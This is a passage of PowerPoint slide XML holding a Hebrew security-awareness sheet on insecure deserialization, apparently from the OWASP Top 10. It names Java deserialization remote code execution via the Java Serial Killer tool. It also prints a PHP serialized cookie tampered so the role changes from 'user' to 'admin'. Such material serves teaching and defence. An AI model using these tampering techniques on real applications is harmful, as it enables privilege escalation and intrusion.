              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תקשורת פנימית ומרוחקת (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RPC/IPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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פרוטוקולים קווים, יישומי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ו-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Message brokers</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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אחסון זמני בזיכרון (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Caching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) או אחסון קבוע</a:t>
            </a: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בסיסי נתונים, שרתי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, מערכות אחסון קבצים</a:t>
            </a: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שימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, פרמטרים בטפסי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לאימות בממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6401310"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> יישום מבוסס </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> קורא לסט של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spring Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>microservices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. צוות פיתוח מנסה לוודא כי הקוד שלו בלתי ניתן לשינוי. הפתרון שהוצא להפוך את ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לרצף תווים ולהעביר אותו הלוך וחזור עם כל בקשה. התוקף מזהה חתימת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“R00”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> של אובייקט מבוסס </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ומשתמש בכלי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java Serial Killer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> על-מנת להשיג יכולת הרצת קוד עוין מרחוק כלפי שרת היישום.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> טופס </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> משתמש באובייקט </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אשר נוצר מרצף תווים על-מנת לשמור על </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“super” cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, המכיל את מזהה המשתמש, התפקיד, ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> של הסיסמא ומזהים נוספים:</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>התוקף משנה את האובייקט שנוצר מרצף התווים על-מנת להעניק לעצמו הרשאת מנהל מערכת:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
